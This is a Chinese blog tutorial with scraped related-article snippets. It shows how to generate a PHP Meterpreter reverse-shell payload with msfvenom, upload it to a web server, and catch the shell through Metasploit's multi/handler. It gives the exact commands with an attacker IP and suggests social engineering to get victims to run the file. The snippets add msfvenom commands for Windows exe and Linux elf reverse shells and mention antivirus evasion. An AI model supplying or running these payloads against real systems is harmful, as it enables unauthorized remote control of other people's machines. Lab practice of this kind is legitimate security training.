vb6.0 生成exe被简称是木马_使用MSF渗透框架生成PHP木马并实现控制远程服务器

最新推荐文章于 2023-12-17 21:29:41 发布
最新推荐文章于 2023-12-17 21:29:41 发布
阅读量300 收藏 1
点赞数
文章标签: vb6.0 生成exe被简称是木马

一、背景介绍

Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!

二、资源装备

1.安装好 Win7的虚拟机一台

2.整装待发的小白一个。

3.安装好的Kali Linux虚拟机一台。

战略安排

3.1 将受害者主机(Windows7)跟攻击者主机(Kali Linux)的网络模式全部设置为NAT模式,如下图所示。

步骤:打开虚拟机的设置/选择网络适配器/选择NAT模式。

ddccb5057b75ccf340a7be488ae1ea37.png

3.2 查看实验的两台主机的IP地址,如下图所示。

命令:ifconfig

a506985841d529e59765e967a4691a51.png

3.3 利用“msfvenom”木马生成工具生成对应的木马文件,如下图所示。

步骤1:msfvenom工具的参数介绍

-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的

-o, –out < path> 指定创建好的payload的存放位置。

-h, –help 查看帮助选项。

步骤2:利用msfvenom工具生成对应的木马文件,如下图所示。

命令:msfvenom -p 指定需要使用的payload(攻击荷载) lhost=攻击者主机IP -f exe > 生成木马文件的保存位置

例子:msfVenom -p php/meterpreter/reverse_tcp lhost=192.168.78.168 lport=4444 -r raw > /root/hack.php

0ecda55d743d0ad7ac902122d83cf6b1.png

步骤3:在已知的木马文件保存路径目录下查找对应的木马文件是否已经生成,如下图所示,木马文件已经存在(这里使用图形化文件管理系统来查看,你也可以利用ls命令查看对应路径下面是否已经生成对应的木马文件)。

ae6224ab9cda0c83c921d35c25318a62.png

3.4 利用一定的社会工程学方法将生成的木马文件发送到目标受害者主机,并且在受害者主机进行运行(对应的社会工程学知识请持续关注本号,后续讲解),如下图所示。

e9edba60fbebd453061ee681ce633842.png

3.5 安装“phpstudy集成环境”,如下图所示。

步骤1:打开“phpstudy”官网选择与你电脑系统相对应的软件版本下载。

步骤2:安装注意事项

1. 安装路径不能包含“中文”或者“空格”,否则会报错(例如错误提示:Can't change dir to 'G:\\x65b0\x5efa\x6587\)

2. 保证安装路径是纯净的,安装路径下不能有已安装的V8版本,若重新安装,请选择其它路径

步骤3:phpstudy官方使用教程,需者自取。

网址:https://www.php.cn/course/1066.html

a53d0674b8e67de08f5846ed7aa5044f.png

3.6 安装好对应的软件后,启动phpstudy中的环境,如下图所示。

步骤1:点击相应的环境旁边的启动按钮启动即可。

4a76ea5a4725b4cfc3415dfce92c84b8.png

步骤2:进入apache服务,如下图所示。

3e9537ef0db2fa930b17102523423a88.png

3.7 将对应的木马文件上传到apache服务的www目录下,如下图所示。

cbee9641f36dab9054117f8633e1e41b.png

3.8 启动Metasploit(msf)渗透框架,如下图所示。

命令1:msfconsole

d9b17e58881031e7c568fe240a94cd72.png

命令2:use exploit/multi/handler

b90b795c828184ca5108deb2653f31a1.png

命令3:set payload php/meterpreter/reverse_tcp

db8b23db39cfcf099ffcbe294e4a14b7.png

命令4:show options

38d52e1661e38d5ff1507e378d6ed41f.png

命令5:set lhost 192.168.78.168

822f3bb704fbe60bd50c17aed645a439.png

命令6:run(启动攻击模块)

b896ee35d06ecd1308c9454b6261c7e2.png

3.9 拿到目标主机服务器的shell,如下图所示。

命令:shell进入shell页面。

47d9b4f2e9f4093a97061824ad4a2d95.png

weixin_39805387
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux渗透测试之Msfvenom木马生成与攻防实战
02-25
一、课程概要       本课程主要分享Kali Linux渗透测试之Msfvenom木马生成与攻防实战技巧!二、适合人员      1、零基础大学生      2、IT技术人员      3、服务器运维工程师      4、渗透测试工程师三、特别说明       1、本课程支持一次购买,享受永久观看!       2、本课程支持一次购买,享受永久更新!       3、本课程系讲师原创课程,如有盗用,欢迎举报!
【网络安全】 MSF生成木马教程,网络安全框架
最新发布
2401_84240742的博客
04-11 1030
3、免杀加壳:本例用的是 Themida。
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3281
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
利用 msfvenom 生成木马远程操控 Windows
感谢关注
12-17 627
6.等待上钩,或者把木马发给别人(bushi)查看有无摄像头(doge)1.启动kali,切换到。,在自己的电脑上生成木马。(2)检查是否连上,显示。
利用msf进行内网的木马渗透详细教程
m0_52332592的博客
11-11 4186
内网渗透木马测试
VB-shujuku.rar_VB_vb MSF SHUJUKU
09-22
标题中的"VB-shujuku.rar_VB_vb MSF SHUJUKU"表明这是一个与Visual Basic(VB)相关的数据库教程或示例项目,其中可能包含如何利用VB与数据库进行交互的代码和实例。MSF(Microsoft Solutions Framework)在这里可能...
php-msf-docs:PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual
04-29
PHP微服务框架开发手册,即Micro Service Framework For PHP Develop Manual,PHP微服务框架即,是Camera360社区服务器端团队基于Swoole自主研发的现代化PHP服务框架简称msf或者php-msf,它的核心设计思想是采用...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
"MSFconsole(msf渗透神器)windows平台可以使用,亲测可用" 指出该资源是Metasploit Framework(简称MSF)的一个版本,特别适用于Windows操作系统,并且已经被验证为可正常运行。MSFconsole是Metasploit Framework的...
MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑
09-24
标题中的“MSF.rar_MSF.rar_matlab msf_matlab 均值平移_meanshift 平滑_图像平滑”表明这是一个与Matlab编程相关的项目,具体是使用均值平移(Meanshift)算法来实现图像平滑处理。这个算法在图像处理领域常用于...
Generic_Player_3.4.4.1_20080911.rar_CMMB MSF_Generic_Play_cmmb p
09-24
“Generic Player 3.4.4.1_20080911.exe”是该播放软件的安装程序,用户可以通过运行这个文件在他们的设备上安装CMMB播放器。安装后,用户将能够接收到CMMB信号,并通过播放器解码和播放收到的节目。值得注意的是,...
VS MFC编译后的exe文件传给他人使用
LindenTao
04-24 2661
MFC将编译后的EXE文件直接传给他人使用,将动态链接库改成静态链接库即可. 项目 -> 配置属性->常规->MFC的使用 :在静态库中使用MFC(此项必须设置)。 项目 -> 配置属性->C/C++->代码生成->运行库 :选择/MT
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马
weixin_51803729的博客
02-11 7406
渗透测试Metasploit框架体验(3. MsfVenom生成后门木马
利用Msfvenom制作木马
qq_56150805的博客
03-30 593
msf配置监听之前要配置payload,不然就会连接不上。
渗透测试-使用metasploit的evasion模块生成后门木马
保持微笑的博客
01-17 1766
1.evasion简介 evasion是metasploit自带的模块,使用此模块可以生成反杀毒软件的木马。 2.操作流程 打开kali系统的Metasploit软件。 如图,我们可以看到evasion中有7个模块 查看模块 search evasion 使用模块use evasion/windows/windows_defender_exe 查看需要配置的参数 show options 生成软件set FILENAME 666.exe 指定一个payloadset ...
SQLMAP/Metasploit介绍及PHP网站渗透
weixin_30332705的博客
09-14 1379
查找PHP网页: inurl:php?id= 查询jsp网页:inurl:asp?id= 判断网页的动态还是静态 www.baidu.com------>www.baidu.com/index.html-----没有报错就是静态页面 www.baidu.com/plasp?id=86------>www.baidu.com/plasp?id=86 and 1=...
Kali Linux渗透测试小实践——Metasploit与后门木马
PICACHU+++的博客
01-08 2773
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
vb6.0集成开发环境_加明作品|IDLE集成开发环境美化教程
weixin_39567870的博客
12-07 379
说明:有行号在教学中交流起来是很方便的,然IDLE默认无行号,解决的办法常常是换编辑器。还有一个方法是LineNumbers.py文件,操作起来有一定难度,也与版本有关,感谢吴老师把方案提供给大家,供学习参考,期待您的更多心得分享。IDLE集成开发环境美化教程 泉州七中 吴加明Python有太多的第三方集成开发环境,本人在课堂教学中更倾向于...
msf上制作简单的windows exe木马
weixin_73942557的博客
10-25 776
msf制作Windows可执行程序木马并利用。首先利用用组件msfvenom制作木马。然后将生成木马放到你准备的靶机上面。设置payload、监听IP和端口。在靶机上运行生成木马文件。进入msfconsole。-p设置payload。然后设置返回IP和端口。-f设置生成木马的类型。使用exploit利用。-o设置路径和文件名。目前就已经提权成功了。
MSF-使用备忘录
qq_50643984的博客
03-01 513
一.使用msf生成各种类型payload 1.生成win的exe木马文件 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4433 -f exe >/root/muma.exe 2.生成linux的可执行文件 msfvenom -p linux/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4433 -f elf >/root/muma.elf 注:其
msf生成linux木马
03-16
生成Linux木马,可以使用MSF中的payload生成器来创建一个适合Linux系统的payload,然后使用MSF中的exploit模块来利用漏洞,将payload注入到目标系统中,从而实现远程控制。具体操作可以参考MSF的官方文档或相关...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值